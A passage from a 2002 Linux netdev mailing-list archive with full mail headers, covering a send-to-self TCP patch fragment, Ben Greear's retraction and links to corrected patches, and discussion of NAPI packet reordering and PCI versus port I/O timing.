tcp_v4_iif(skb); + /* Find possible connection requests. */ req = tcp_v4_search_req(tp, &prev, th->source, - iph->saddr, iph->daddr); + iph->saddr, iph->daddr, device_id); if (req) return tcp_check_req(sk, skb, req, prev); @@ -1599,7 +1627,7 @@ th->source, skb->nh.iph->daddr, ntohs(th->dest), - tcp_v4_iif(skb)); + device_id); if (nsk) { if (nsk->state != TCP_TIME_WAIT) { --------------010703030901020509080500-- From davem@redhat.com Tue Sep 17 23:48:42 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 23:48:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I6mftG010892 for ; Tue, 17 Sep 2002 23:48:42 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id XAA19447; Tue, 17 Sep 2002 23:44:40 -0700 Date: Tue, 17 Sep 2002 23:44:40 -0700 (PDT) Message-Id: <20020917.234440.114538956.davem@redhat.com> To: greearb@candelatech.com Cc: netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: [PATCH] Networking: send-to-self From: "David S. Miller" In-Reply-To: <3D88217A.6070702@candelatech.com> References: <3D88217A.6070702@candelatech.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 252 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev We saw it the first two times. From greearb@candelatech.com Tue Sep 17 23:48:43 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 23:48:44 -0700 (PDT) Received: from grok.yi.org (IDENT:8yZNJ/NmETFwOW9CllocmHE3iFZDeVrA@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I6mftG010891 for ; Tue, 17 Sep 2002 23:48:42 -0700 Received: from candelatech.com (IDENT:q9nq1Tgk2c6yJiVKQ9ZPimv1uETcQLug@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I6rev23389; Tue, 17 Sep 2002 23:53:40 -0700 Message-ID: <3D8822F4.6060201@candelatech.com> Date: Tue, 17 Sep 2002 23:53:40 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Ben Greear CC: "'netdev@oss.sgi.com'" , linux-kernel Subject: Re: [PATCH] Networking: send-to-self References: <3D88217A.6070702@candelatech.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 253 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Ben Greear wrote: > This patch allows one to use the SO_BINDTODEVICE and a new ioctl against > net_device objects to send and receive regular routed traffic between two Gack, sorry for the last patch..it seems I screwed up the patch process somehow. Plz don't apply it as is! -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Wed Sep 18 00:04:50 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 00:04:52 -0700 (PDT) Received: from grok.yi.org (IDENT:VGD6t3rHdICvYUoz4Q2sBS1O0V5iUL7I@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I74ntG012161 for ; Wed, 18 Sep 2002 00:04:50 -0700 Received: from candelatech.com (IDENT:BNFaWzdzIL33b/EQarKQjWf3fsYNhWfj@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I79ov25480; Wed, 18 Sep 2002 00:09:51 -0700 Message-ID: <3D8826BE.5090007@candelatech.com> Date: Wed, 18 Sep 2002 00:09:50 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" CC: linux-kernel Subject: Re: [PATCH] Networking: send-to-self [link to non-broken patch this time] References: <3D88217A.6070702@candelatech.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 254 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev So, I feel bad about wasting bandwidth and spamming folks with busted patches. The corrected patch(es) can be found here for those who are interested: http://www.candelatech.com/sts_2.4.19.patch http://www.candelatech.com/sts2_hack.patch Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Wed Sep 18 00:09:35 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 00:09:37 -0700 (PDT) Received: from grok.yi.org (IDENT:UsGhFwdIVTwOaEa97gSNym9y1Odxrr9t@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8I79ZtG012565 for ; Wed, 18 Sep 2002 00:09:35 -0700 Received: from candelatech.com (IDENT:yBPxYISfCYn4IxKHZfHN3l0MTG9jYXDt@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8I7Eav26086 for ; Wed, 18 Sep 2002 00:14:36 -0700 Message-ID: <3D8827DC.4060200@candelatech.com> Date: Wed, 18 Sep 2002 00:14:36 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "'netdev@oss.sgi.com'" Subject: [PATCH] pktgen (link to non-busted patch this time) Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 255 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Sorry for the confusion, the last patch was against vanilla 2.4.19, not 2.4.20-pre7 like it should have been. You can find the corrected patch here if you are interested: http://www.candelatech.com/pg_2.4.19.patch Thanks, Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From hadi@cyberus.ca Wed Sep 18 04:50:50 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 04:50:56 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IBontG019962 for ; Wed, 18 Sep 2002 04:50:50 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id HAA08898; Wed, 18 Sep 2002 07:55:47 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8IBmgT04722; Wed, 18 Sep 2002 07:48:43 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Wed, 18 Sep 2002 07:48:42 -0400 (EDT) From: jamal To: Ben Greear cc: Chris Friesen , Cacophonix , , Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation In-Reply-To: <3D87FBD5.3030508@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 256 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Tue, 17 Sep 2002, Ben Greear wrote: > I see reordering on regular old socket calls from user space, and I see > the same thing with pktgen packets as well (which clears the stack of fault). > > > Did you get reordering with affinity? > > Yes. I'm not sure I tried affinity w/out NAPI though. I definately tried > it with NAPI and saw reordering. > Ok, now it is getting interesting. I would start to be suspicious about either the hardware or driver. Please try without NAPI and affinity and post what you see (not that this result matters but should help confirn things). cheers, jamal From ebiederm@xmission.com Wed Sep 18 10:37:17 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 10:37:23 -0700 (PDT) Received: from frodo.biederman.org (ebiederm.dsl.xmission.com [166.70.28.69]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IHbGtG008270 for ; Wed, 18 Sep 2002 10:37:17 -0700 Received: (from eric@localhost) by frodo.biederman.org (8.9.3/8.9.3) id LAA07325; Wed, 18 Sep 2002 11:27:34 -0600 To: "David S. Miller" Cc: hadi@cyberus.ca, akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Info: NAPI performance at "low" loads References: <3D87A59C.410FFE3E@digeo.com> <20020917.180014.07882539.davem@redhat.com> From: ebiederm@xmission.com (Eric W. Biederman) Date: 18 Sep 2002 11:27:34 -0600 In-Reply-To: <20020917.180014.07882539.davem@redhat.com> Message-ID: Lines: 21 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 257 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ebiederm@xmission.com Precedence: bulk X-list: netdev "David S. Miller" writes: > From: jamal > Date: Tue, 17 Sep 2002 20:57:58 -0400 (EDT) > > I am not so sure with that 6% difference there is no other bug lurking > there; 6% seems too large for an extra two PCI transactions per packet. > > {in,out}{b,w,l}() operations have a fixed timing, therefore his > results doesn't sound that far off. ???? I don't see why they should be. If it is a pci device the cost should the same as a pci memory I/O. The bus packets are the same. So things like increasing the pci bus speed should make it take less time. Plus I have played with calibrating the TSC with outb to port 0x80 and there was enough variation that it was unuseable. On some newer systems it would take twice as long as on some older ones. Eric From alan@lxorguk.ukuu.org.uk Wed Sep 18 10:42:57 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 10:43:01 -0700 (PDT) Received: from irongate.swansea.linux.org.uk (pc1-cwma1-5-cust128.swa.cable.ntl.com [80.5.120.128]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IHgttG009095 for ; Wed, 18 Sep 2002 10:42:56 -0700 Received: from irongate.swansea.linux.org.uk (localhost [127.0.0.1]) by irongate.swansea.linux.org.uk (8.12.5/8.12.5) with ESMTP id g8IHou5a024147; Wed, 18 Sep 2002 18:50:56 +0100 Received: (from alan@localhost) by irongate.swansea.linux.org.uk (8.12.5/8.12.5/Submit) id g8IHorUU024145; Wed, 18 Sep 2002 18:50:53 +0100 X-Authentication-Warning: irongate.swansea.linux.org.uk: alan set sender to alan@lxorguk.ukuu.org.uk using -f Subject: Re: Info: NAPI performance at "low" loads From: Alan Cox To: "Eric W. Biederman" Cc: "David S. Miller" , hadi@cyberus.ca, akpm@digeo.com, manfred@colorfullife.com, netdev@oss.sgi.com, linux-kernel@vger.kernel.org In-Reply-To: References: <3D87A59C.410FFE3E@digeo.com> <20020917.180014.07882539.davem@redhat.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) Date: 18 Sep 2002 18:50:53 +0100 Message-Id: <1032371453.20463.139.camel@irongate.swansea.linux.org.uk> Mime-Version: 1.0 X-archive-position: 258 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: alan@lxorguk.ukuu.org.uk Precedence: bulk X-list: netdev On Wed, 2002-09-18 at 18:27, Eric W. Biederman wrote: > Plus I have played with calibrating the TSC with outb to port > 0x80 and there was enough variation that it was unuseable. On some > newer systems it would take twice as long as on some older ones. port 0x80 isnt going to PCI space. x86 generally posts mmio write but not io write. Thats quite measurable. From davem@redhat.com Wed Sep 18 13:28:14 2002 Received: with ECARTIS (v1.0.0; list netdev); Wed, 18 Sep 2002 13:28:19 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8IKSDtG013250 for ; Wed,